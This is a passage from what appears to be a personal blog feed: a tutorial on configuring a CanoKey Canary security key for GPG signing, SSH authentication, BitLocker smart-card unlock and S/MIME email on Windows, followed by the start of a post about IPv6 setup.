(y/N) y</span><br><span class="line"></span><br><span class="line"># A validity period of 5-10 years is recommended for the primary key, so that it does not get out of your control if you lose it for personal reasons.</span><br><span class="line"></span><br><span class="line">Real name: Editst</span><br><span class="line">Email address: editst@example.com</span><br><span class="line">Comment:</span><br><span class="line">You selected this USER-ID:</span><br><span class="line"> "Editst <editst@example.com>"</span><br><span class="line"></span><br><span class="line"># It is recommended to use the email address associated with your GitHub account here</span><br><span class="line"></span><br><span class="line">Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? o</span><br><span class="line"></span><br><span class="line">We need to generate a lot of random bytes. It is a good idea to perform</span><br><span class="line">some other action (type on the keyboard, move the mouse, utilize the</span><br><span class="line">disks) during the prime generation; this gives the random number</span><br><span class="line">generator a better chance to gain enough entropy.</span><br><span class="line"></span><br><span class="line"># On Windows a window pops up asking for a passphrase; be sure to keep it safe!!!</span><br><span class="line"></span><br><span class="line">gpg: revocation certificate stored as 'C:\\Users\\XXX\\AppData\\Roaming\\gnupg\\openpgp-revocs.d\\68697537A54B1F0BFC05E1D9787E848E1A98D086.rev'</span><br><span class="line">public and secret key created and signed.</span><br><span class="line"></span><br><span class="line"># A revocation certificate is generated automatically; be sure to store it somewhere safe</span><br><span class="line"></span><br><span class="line">pub ed25519/787E848E1A98D086 2022-01-01 [C]</span><br><span class="line"> Key fingerprint = 6869 7537 A54B 1F0B FC05 E1D9 787E 848E 1A98 D086</span><br><span class="line">uid Editst <editst@example.com></span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="2-生成子密钥"><a href="#2-生成子密钥" class="headerlink" title="2. Generate the subkeys"></a>2. Generate the subkeys</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --fingerprint --keyid-format long -K</span><br><span class="line">C:\Users\XXX\AppData\Roaming\gnupg\pubring.kbx</span><br><span class="line">------------------------------------------------</span><br><span class="line">sec ed25519/787E848E1A98D086 2022-01-01 [C]</span><br><span class="line"> Key fingerprint = 6869 7537 A54B 1F0B FC05 E1D9 787E 848E 1A98 D086</span><br><span class="line">uid [ultimate] Editst <editst@example.com></span><br><span class="line"></span><br><span class="line">$ gpg --quick-add-key 68697537A54B1F0BFC05E1D9787E848E1A98D086 cv25519 encr 5y</span><br><span class="line">$ gpg --quick-add-key 68697537A54B1F0BFC05E1D9787E848E1A98D086 ed25519 auth 5y</span><br><span class="line">$ gpg --quick-add-key 68697537A54B1F0BFC05E1D9787E848E1A98D086 ed25519 sign 5y</span><br><span class="line"></span><br><span class="line"># A validity period of at most 5 years is recommended for subkeys</span><br></pre></td></tr></table></figure><p>List the current secret keys again and you can see that the three subkeys are now included. </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">gpg --fingerprint --keyid-format long -K</span><br><span class="line">C:\Users\XXX\AppData\Roaming\gnupg\pubring.kbx</span><br><span 
class="line">------------------------------------------------</span><br><span class="line">sec ed25519/787E848E1A98D086 2022-01-01 [C]</span><br><span class="line"> Key fingerprint = 6869 7537 A54B 1F0B FC05 E1D9 787E 848E 1A98 D086</span><br><span class="line">uid [ultimate] Editst <editst@example.com></span><br><span class="line">ssb ed25519/055917609C9C0D7B 2022-01-01 [S] [expires: 2024-01-01]</span><br><span class="line"> Key fingerprint = E99F 3D15 7ACF 7E24 3DC8 FFE7 0559 1760 9C9C 0D7B</span><br><span class="line">ssb ed25519/05F4A6C335157258 2022-01-01 [A] [expires: 2024-01-01]</span><br><span class="line"> Key fingerprint = C4B9 7EEC 4060 F856 7A4D 2956 05F4 A6C3 3515 7258</span><br><span class="line">ssb cv25519/C5B8214C3AD21C6C 2022-01-01 [E] [expires: 2024-01-01]</span><br><span class="line"> Key fingerprint = E39E E067 3233 BD73 7ED1 15F1 C5B8 214C 3AD2 1C6C</span><br><span class="line"></span><br></pre></td></tr></table></figure><h4 id="3-备份-备份-备份"><a href="#3-备份-备份-备份" class="headerlink" title="3. Back up, back up, back up"></a>3. Back up, back up, back up</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"># Public key</span><br><span class="line">$ gpg -ao public-key.pub --export 787E848E1A98D086</span><br><span class="line"></span><br><span class="line"># Revocation certificate</span><br><span class="line">Path: %APPDATA%\gnupg\openpgp-revocs.d\68697537A54B1F0BFC05E1D9787E848E1A98D086.rev</span><br><span class="line"></span><br><span class="line"># Primary key and the three subkeys</span><br><span class="line">gpg -ao sec-key.asc --export-secret-key 787E848E1A98D086!</span><br><span class="line">gpg -ao sign-key.asc 
--export-secret-key 055917609C9C0D7B!</span><br><span class="line">gpg -ao auth-key.asc --export-secret-key 05F4A6C335157258!</span><br><span class="line">gpg -ao encr-key.asc --export-secret-key C5B8214C3AD21C6C!</span><br></pre></td></tr></table></figure><p>Pack these files into an encrypted 7z archive, using a sufficiently long password generated and stored in KeePass, then keep the archive on a cloud drive of your choice or burn it to a disc and put it in the wardrobe. </p><h4 id="4-导入-Canokey"><a href="#4-导入-Canokey" class="headerlink" title="4. Import into Canokey"></a>4. Import into Canokey</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span 
class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --edit-card</span><br><span class="line">Reader ...........: canokeys.org OpenPGP PIV OATH 0</span><br><span class="line">Manufacturer .....: CanoKeys</span><br><span class="line">......</span><br><span class="line"></span><br><span class="line"># Enter Admin mode</span><br><span class="line">gpg/card> admin</span><br><span class="line">Admin commands are allowed</span><br><span class="line"></span><br><span class="line">gpg/card> passwd</span><br><span class="line">gpg: OpenPGP card no. 
xxxxxxxxxxxxxxxxxxxxxxxxxxx detected</span><br><span class="line"></span><br><span class="line">1 - change PIN</span><br><span class="line">2 - unblock PIN</span><br><span class="line">3 - change Admin PIN</span><br><span class="line">4 - set the Reset Code</span><br><span class="line">Q - quit</span><br><span class="line"></span><br><span class="line"># It is best to change both the PIN and the Admin PIN</span><br><span class="line"></span><br><span class="line">......</span><br><span class="line"></span><br><span class="line"># Quit once they have been changed</span><br><span class="line">gpg/card>quit</span><br><span class="line"></span><br><span class="line">$ gpg --edit-key 787E848E1A98D086</span><br><span class="line"></span><br><span class="line">sec ed25519/787E848E1A98D086</span><br><span class="line"> created: 2022-01-01 expires: never usage: C</span><br><span class="line"> trust: ultimate validity: ultimate</span><br><span class="line">ssb ed25519/055917609C9C0D7B</span><br><span class="line"> created: 2022-01-01 expires: 2024-01-01 usage: S</span><br><span class="line">ssb ed25519/05F4A6C335157258</span><br><span class="line"> created: 2022-01-01 expires: 2024-01-01 usage: A</span><br><span class="line">ssb cv25519/C5B8214C3AD21C6C</span><br><span class="line"> created: 2022-01-01 expires: 2024-01-01 usage: E</span><br><span class="line">[ultimate] (1). Editst <editst@example.com></span><br><span class="line"></span><br><span class="line">gpg> key 1 # First select the first subkey</span><br><span class="line"></span><br><span class="line">gpg> keytocard</span><br><span class="line">Please select where to store the key:</span><br><span class="line"> (1) Signature key</span><br><span class="line">Your selection? 
1 # Choose the corresponding slot</span><br><span class="line"></span><br><span class="line"># First enter the OpenPGP key passphrase, then the Admin PIN of the OpenPGP Applet</span><br><span class="line"># After that, deselect key 1, then select key 2 and key 3 in turn and repeat the same steps</span><br><span class="line"></span><br><span class="line">gpg> key 1</span><br><span class="line">gpg> key 2</span><br><span class="line">gpg> keytocard</span><br><span class="line">Please select where to store the key:</span><br><span class="line"> (3) Authentication key</span><br><span class="line">Your selection? 3</span><br><span class="line">gpg> key 2</span><br><span class="line">gpg> key 3</span><br><span class="line">gpg> keytocard</span><br><span class="line">Please select where to store the key:</span><br><span class="line"> (2) Encryption key</span><br><span class="line">Your selection? 2</span><br><span class="line"></span><br><span class="line">gpg> save # Save the changes</span><br><span class="line"></span><br><span class="line"># Check the Canokey status to confirm the import succeeded</span><br><span class="line">$ gpg --card-status</span><br><span class="line">Reader ...........: canokeys.org OpenPGP PIV OATH 0</span><br><span class="line">......</span><br><span class="line">General key info..: sub ed25519/055917609C9C0D7B 2022-01-01 Editst <editst@example.com></span><br><span class="line">sec ed25519/787E848E1A98D086 created: 2022-01-01 expires: never</span><br><span class="line">ssb> cv25519/055917609C9C0D7B created: 2022-01-01 expires: 2024-01-01</span><br><span class="line"> card-no: F1D0 xxxxxxxx</span><br><span class="line">ssb> ed25519/05F4A6C335157258 created: 2022-01-01 expires: 2024-01-01</span><br><span class="line"> card-no: F1D0 xxxxxxxx</span><br><span class="line">ssb> ed25519/C5B8214C3AD21C6C created: 2022-01-01 expires: 2024-01-01</span><br><span class="line"> card-no: F1D0 xxxxxxxx</span><br></pre></td></tr></table></figure><p>Once you see <code>ssb></code>, you can delete the primary key: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td 
class="code"><pre><span class="line">gpg --delete-secret-keys 787E848E1A98D086</span><br></pre></td></tr></table></figure><h4 id="5-使用-Canokey"><a href="#5-使用-Canokey" class="headerlink" title="5. Use Canokey"></a>5. Use Canokey</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"># Import the public key</span><br><span class="line">$ gpg --import public-key.pub</span><br><span class="line">$ gpg --edit-card</span><br><span class="line">$ gpg/card> fetch</span><br><span class="line"></span><br><span class="line"># List the local secret keys and confirm that they now point to the Canokey</span><br><span class="line">$ gpg --fingerprint --keyid-format long -K</span><br><span class="line">C:\Users\XXX\AppData\Roaming\gnupg\pubring.kbx</span><br><span class="line">------------------------------------------------</span><br><span class="line">sec# ed25519/787E848E1A98D086 2022-01-01 [C]</span><br><span class="line"> Key fingerprint = 6869 7537 A54B 1F0B FC05 E1D9 787E 848E 1A98 D086</span><br><span class="line">uid [ultimate] Editst <editst@example.com></span><br><span class="line">ssb> ed25519/055917609C9C0D7B 2022-01-01 [S] [expires: 2024-01-01]</span><br><span class="line"> Key fingerprint = E99F 3D15 7ACF 7E24 3DC8 FFE7 0559 1760 9C9C 0D7B</span><br><span class="line"> Card serial no. 
= F1D0 xxxxxxxx</span><br><span class="line">ssb> ed25519/05F4A6C335157258 2022-01-01 [A] [expires: 2024-01-01]</span><br><span class="line"> Key fingerprint = C4B9 7EEC 4060 F856 7A4D 2956 05F4 A6C3 3515 7258</span><br><span class="line"> Card serial no. = F1D0 xxxxxxxx</span><br><span class="line">ssb> cv25519/C5B8214C3AD21C6C 2022-01-01 [E] [expires: 2024-01-01]</span><br><span class="line"> Key fingerprint = E39E E067 3233 BD73 7ED1 15F1 C5B8 214C 3AD2 1C6C</span><br><span class="line"> Card serial no. = F1D0 xxxxxxxx</span><br></pre></td></tr></table></figure><h5 id="5-1-Git-Commit-签名"><a href="#5-1-Git-Commit-签名" class="headerlink" title="5.1 Git Commit Signing"></a>5.1 Git Commit Signing</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ git config --global user.signingkey 055917609C9C0D7B # The signing (S) key among the subkeys</span><br><span class="line"></span><br><span class="line"># After this, add the -S option to git commit to sign with gpg, or simply turn signing on globally:</span><br><span class="line">$ git config --global commit.gpgsign true</span><br></pre></td></tr></table></figure><h5 id="5-2-SSH-with-gpg-agent"><a href="#5-2-SSH-with-gpg-agent" class="headerlink" title="5.2 SSH with gpg agent"></a>5.2 SSH with gpg agent</h5><p>First, write the following into <code>%AppData%\gnupg\gpg-agent.conf</code> (create the file if it does not exist):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">enable-win32-openssh-support</span><br><span class="line">enable-ssh-support</span><br><span class="line">enable-putty-support</span><br></pre></td></tr></table></figure><p>Then run <code>gpg -k --with-keygrip</code> to get the Keygrip of the [A] Subkey 
(40 characters; it looks a lot like the fingerprint above, but it is not the same), write it into <code>%AppData%\gnupg\sshcontrol</code> (create the file if it does not exist), then open Task Manager, find <code>gpg-agent.exe</code>, right-click it and end the process tree.<br>Then run <code>gpg --card-status</code> to bring gpg-agent back up.</p><p>Check the public key that OpenSSH reads, and add the printed public key to <code>~/.ssh/authorized_keys</code> on the server </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ ssh-add -L</span><br><span class="line"></span><br><span class="line">ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAzFAR5puWAj0OflZJVzAJqejVEZCap2NhFJbzedYwX2 cardno:F1D0 xxxxxxxx</span><br></pre></td></tr></table></figure><p>Putty settings:<br><img src="/pictures/canokey-canary/3.png"> </p><p>MobaXterm settings:<br><img src="/pictures/canokey-canary/4.png"> </p><h3 id="PIV"><a href="#PIV" class="headerlink" title="PIV"></a>PIV</h3><p>The CanoKey Canary 3.0.0 firmware has a bug, see: <a href="https://docs.canokeys.org/zh-hans/userguide/piv/#11-%E6%94%AF%E6%8C%81%E7%AE%97%E6%B3%95">https://docs.canokeys.org/</a>. It is not a big problem, though, because PIV generally has no use for 25519 at all<br>CanoKey has 4 usable key slots (not counting 82 and 83):<br>  9A: PIV Authentication<br>  9E: Card Authentication<br>  9C: Digital Signature<br>  9D: Key Management<br>Although each key slot has a stated purpose, you can ignore that entirely; in practice you can mostly put a key in whichever slot you like.<br>There is one thing to watch out for that can easily trigger one's OCD, though: when OpenSC reads the card information, it reads the slots in the order <code>9a->9c->9d->9e</code>. That means that if you store a certificate with <code>CN=Disappear9 's CanoKey</code> in slot <code>9c</code>, then whatever the CN of the certificates in the later slots is, the card information will always be shown with the CN from <code>9c</code>, until a certificate is stored in <code>9a</code>.<br>For example: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 
class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">yubico-piv-tool -r canokey -a status</span><br><span class="line">Version: 5.7.0</span><br><span class="line">Slot 9a:</span><br><span class="line"> Algorithm: RSA2048</span><br><span class="line"> Subject DN: CN=Disappear9 's CanoKey, O=D9Lab, C=CN</span><br><span class="line"> Issuer DN: CN=Disappear9 's CanoKey, O=D9Lab, C=CN</span><br><span class="line">Slot 9c:</span><br><span class="line"> Algorithm: RSA2048</span><br><span class="line"> Subject DN: CN=disappear9@outlook.com</span><br><span class="line"> Issuer DN: C=IT, ST=Bergamo, L=Ponte San Pietro, O=Actalis S.p.A., CN=Actalis Client Authentication CA G3</span><br><span class="line">Slot 9d:</span><br><span class="line"> Algorithm: RSA2048</span><br><span class="line"> Subject DN: CN=TEST</span><br><span class="line"> Issuer DN: CN=TEST</span><br><span class="line">PIN tries left: 3</span><br></pre></td></tr></table></figure><p>When viewed in <code>Thunderbird</code>:<br><img src="/pictures/canokey-canary/5.png"> </p><p>So if, like me, you are prone to sudden fits of OCD, you can generate a certificate for Bitlocker yourself and put it in <code>9a</code>. </p><h4 id="Bitlocker"><a href="#Bitlocker" class="headerlink" title="Bitlocker"></a>Bitlocker</h4><p>Create a new <code>certreqcfg.ini</code> file<br>Note: the <code>Subject</code>, <code>NotBefore</code> and <code>NotAfter</code> entries can be changed freely; leave everything else alone. In particular, some people (me, for example) see 2048-bit RSA, feel that it is not secure enough and change it to 4096. The certificate can still be generated and imported, and Bitlocker reads it and locks the drive normally, but when it comes to unlocking, the smart card is suddenly reported as invalid and you can only unlock with the recovery key (at least, this is what happened every time in my tests on win10 LTSC 21H2 and win11 LTSC).</p><figure class="highlight ini"><figcaption><span>certreqcfg.ini</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[NewRequest]</span></span><br><span class="line"><span class="attr">Subject</span> = <span class="string">"C=CN,O=D9Lab,CN=Disappear9 's CanoKey"</span></span><br><span class="line"><span class="attr">NotBefore</span> = <span class="number">2025</span>/<span class="number">01</span>/<span class="number">01</span> <span class="number">00</span>:<span class="number">00</span> AM</span><br><span class="line"><span class="attr">NotAfter</span> = <span class="number">2035</span>/<span class="number">01</span>/<span class="number">01</span> <span class="number">00</span>:<span class="number">00</span> AM</span><br><span class="line"><span class="attr">Exportable</span> = <span class="literal">TRUE</span></span><br><span class="line"><span class="attr">KeyLength</span> = <span class="number">2048</span></span><br><span class="line"><span class="attr">HashAlgorithm</span> = <span class="string">"SHA512"</span></span><br><span class="line"><span class="attr">EncryptionAlgorithm</span> = <span class="string">"AES"</span></span><br><span class="line"><span class="attr">EncryptionLength</span> = <span class="number">256</span></span><br><span class="line"><span class="attr">KeySpec</span> = <span class="string">"AT_KEYEXCHANGE"</span></span><br><span class="line"><span class="attr">KeyUsage</span> = <span class="string">"CERT_KEY_ENCIPHERMENT_KEY_USAGE"</span></span><br><span class="line"><span class="attr">KeyUsageProperty</span> = <span class="string">"NCRYPT_ALLOW_DECRYPT_FLAG"</span></span><br><span class="line"><span class="attr">RequestType</span> = Cert</span><br><span class="line"><span 
class="attr">SMIME</span> = <span class="literal">FALSE</span></span><br><span class="line"></span><br><span class="line"><span class="section">[EnhancedKeyUsageExtension]</span></span><br><span class="line"><span class="attr">OID</span>=<span class="number">1.3</span>.<span class="number">6.1</span>.<span class="number">5.5</span>.<span class="number">7.3</span>.<span class="number">1</span></span><br><span class="line"><span class="attr">OID</span>=<span class="number">1.3</span>.<span class="number">6.1</span>.<span class="number">5.5</span>.<span class="number">7.3</span>.<span class="number">2</span></span><br><span class="line"><span class="attr">OID</span>=<span class="number">1.3</span>.<span class="number">6.1</span>.<span class="number">4.1</span>.<span class="number">311.67</span>.<span class="number">1.1</span></span><br><span class="line"><span class="attr">OID</span>=<span class="number">1.3</span>.<span class="number">6.1</span>.<span class="number">4.1</span>.<span class="number">311.10</span>.<span class="number">3.4</span></span><br><span class="line"><span class="attr">OID</span>=<span class="number">1.3</span>.<span class="number">6.1</span>.<span class="number">4.1</span>.<span class="number">311.10</span>.<span class="number">3.12</span></span><br></pre></td></tr></table></figure><p>运行命令<code>certreq –new certreqcfg.ini certrequest.req</code><br>如果没有错误,那么证书就已经成功生成并安装了。 </p><p>运行命令<code>certmgr.msc</code>打开证书管理器<br><img src="/pictures/canokey-canary/6.png"> </p><p>右键<code>所有任务->导出</code>,选择<code>是,导出私钥</code>,导出pfx文件命名为<code>9a.pfx</code>。</p><p>由于是自签名证书,需要添加注册表允许自签名<br>以管理员权限运行命令</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\FVE /v SelfSignedCertificates /t REG_DWORD /d "1"</span><br></pre></td></tr></table></figure><p>下载安装 <a 
href="https://developers.yubico.com/yubico-piv-tool/Releases/">yubico-piv-tool</a><br><img src="/pictures/canokey-canary/7.png"> </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"># 确认是否能检测到Canokey</span><br><span class="line">$ yubico-piv-tool -r canokeys -a status</span><br><span class="line"></span><br><span class="line"># 修改 PIN、PUK</span><br><span class="line">$ yubico-piv-tool -r canokeys -a change-pin</span><br><span class="line">$ yubico-piv-tool -r canokeys -a change-puk</span><br><span class="line"></span><br><span class="line"># 导入密钥</span><br><span class="line">$ yubico-piv-tool -r canokeys -s 9a -i 9a.pfx -KPKCS12 -a import-key -a import-cert</span><br><span class="line"></span><br><span class="line"># 初始化 Card Holder Unique Identifier 和 CCC</span><br><span class="line">$ yubico-piv-tool -r canokeys -a set-chuid</span><br><span class="line">$ yubico-piv-tool -r canokeys -a set-ccc</span><br><span class="line"></span><br><span class="line"># 确认是否导入成功</span><br><span class="line">$ yubico-piv-tool -r canokeys -a status</span><br></pre></td></tr></table></figure><p>至此,Canokey 就可以用于进行 Bitlocker 加密了。在使用 Bitlocker 时,选择“使用智能卡”即可。</p><p><strong>清理与善后</strong><br>0.将导出的证书像对待上文中的GPG证书一样进行备份。<br>1.删除导出的包含私钥的证书文件<code>9a.pfx</code>。<br>2.在 Windows 的证书管理器中删掉生成的证书,证书同时存储在<code>个人</code> 和 <code>中间证书颁发机构</code>下,要同时删掉。<br>3.删除申请证书过程中的 ini 和 req 文件。 </p><h4 id="S-MIME电子邮件加密"><a href="#S-MIME电子邮件加密" 
class="headerlink" title="S/MIME电子邮件加密"></a>S/MIME电子邮件加密</h4><p><strong>准备工作</strong><br><del>从 <a href="https://www.actalis.com/request-s-mime-certificate">Actalis</a> 申请一个免费的S/MIME证书 参考<a href="https://blog.goodboyboy.top/posts/851058316.html">免费申请S/MIME邮箱证书</a></del><br>Actalis的免费证书没了,用<a href="https://shop.certum.eu/s-mime.html">Certum</a>的吧,15欧元两年,教程参考:<a href="https://www.liups.net/2025/10/s-mime-%E8%AF%81%E4%B9%A6%E7%AD%BE%E5%90%8D%E5%8A%A0%E5%AF%86%E7%94%B5%E5%AD%90%E9%82%AE%E4%BB%B6/#%E4%BB%98%E8%B4%B9%E7%9A%84%EF%BC%88%EF%BC%89">使用 S/MIME 证书签名并加密电子邮件</a><br>安装 <a href="https://www.thunderbird.net/zh-CN/thunderbird/all/">Thunderbird</a><br>安装 <a href="https://github.com/OpenSC/OpenSC/releases">OpenSC</a><br>安装 <a href="https://developers.yubico.com/yubico-piv-tool/Releases/">yubico-piv-tool</a> </p><p>导入证书: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ yubico-piv-tool -r canokeys -s 9c -i certificate.p12 -KPKCS12 -a import-key -a import-cert --pin-policy=once</span><br></pre></td></tr></table></figure><p>如果你有不止一个邮箱的证书可以继续导入<code>9d</code>, <code>9e</code>槽位,我们可以在导入命令的后面附加<code>--pin-policy</code>或<code>--touch-policy</code>选项覆盖掉默认规则,防止默认规则下<code>9e</code>槽位可以不经验证被直接使用。详细使用方法参考: <a href="https://developers.yubico.com/yubico-piv-tool/Manuals/yubico-piv-tool.1.html">https://developers.yubico.com/yubico-piv-tool/Manuals/yubico-piv-tool.1.html</a> </p><p><strong>冲突预防</strong><br>如果你依照上文配置了GPG,在不做修改的情况下GPG会和OpenSC起冲突。<br>参考: <a href="https://blog.apdu.fr/posts/2024/12/gnupg-and-pcsc-conflicts-episode-3/">GnuPG and PC/SC conflicts, episode 3</a><br>在<code>%AppData%\gnupg\scdaemon.conf</code>中写入(没有就新建一个):</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">disable-ccid</span><br><span 
class="line">pcsc-shared</span><br></pre></td></tr></table></figure><p>然后开任务管理器,找到<code>gpg-agent.exe</code>(如有),右键结束进程树。</p><p><strong>配置<code>Thunderbird</code></strong><br><img src="/pictures/canokey-canary/8.png"><br><img src="/pictures/canokey-canary/9.png"><br>选择 <code>C:\Program Files\OpenSC Project\OpenSC\pkcs11\opensc-pkcs11.dll</code> </p><p>加载后就可以看到Canokey了(重用一下上面的图)<br><img src="/pictures/canokey-canary/5.png"> </p><p>选择与邮箱对应的证书<br><img src="/pictures/canokey-canary/10.png"> </p><p>然后在写信时就可以选择签名/加密了<br><img src="/pictures/canokey-canary/11.png"> </p><p>别人收到以后是这么一个效果:<br><img src="/pictures/canokey-canary/12.png"> </p>]]></content>
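<summary type="html"><h3 id="引言"><a href="#引言" class="headerlink" title="引言"></a>Introduction</h3><p>I first came across CanoKey back in 2021, when I followed the crowd and bought the CanoKey Pigeon at launch. After I loaded my GPG keys onto it and registered it as an authenticator on a few websites, it mostly sat gathering dust. Website logins do not expire every day, after all, and as for GPG, nobody has sent me an encrypted message in ages; I rarely even use it for git signing (I am lazy). </p>
<p>A while ago the CanoKey group held a giveaway of the Canary beta, and I was lucky enough to win one:<br><img src="/pictures/canokey-canary/1.png"> </p>
<p>So it would seem a bit wrong not to tinker with it some more. </p>
<hr>
<h3 id="环境确认"><a href="#环境确认" class="headerlink" title="环境确认"></a>Environment</h3><p>Hardware:<br>&emsp;&emsp;CanoKey Canary (3.0.0-rc2-0 dirty build)<br>Operating system:<br>&emsp;&emsp;Windows 10 LTSB 21H2<br>Software versions:<br>&emsp;&emsp;gpg4win 4.4 (gpg 2.4.7)<br>&emsp;&emsp;OpenSC 0.26.0 </p></summary>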
<category term="折腾那些事" scheme="https://thinkalone.win/categories/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>What it is like to configure IPv6 in 2024</title>
<link href="https://thinkalone.win/ipv6-in-2024.html"/>
<id>https://thinkalone.win/ipv6-in-2024.html</id>
<published>2024-09-01T04:00:00.000Z</published>
<updated>2024-09-15T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h3 id="Do-not-手欠"><a href="#Do-not-手欠" class="headerlink" title="Do not 手欠"></a>Do not fiddle</h3><p>A while ago I changed my broadband plan and lost my public IPv4 address; the ISP will not give one back even on request, so I was forced to start moving to IPv6.</p><hr>
<h3 id="环境"><a href="#环境" class="headerlink" title="环境"></a>Environment</h3><p>Main router:<br>  ImmortalWrt 21.02<br>Systems:<br>  Windows 10 LTSB 21H2<br>  Debian 12 (bookworm)<br>  Ubuntu 22.04 LTS (jammy)<br>ISP:<br>  China Telecom (DHCPv6-PD) </p><span id="more"></span>
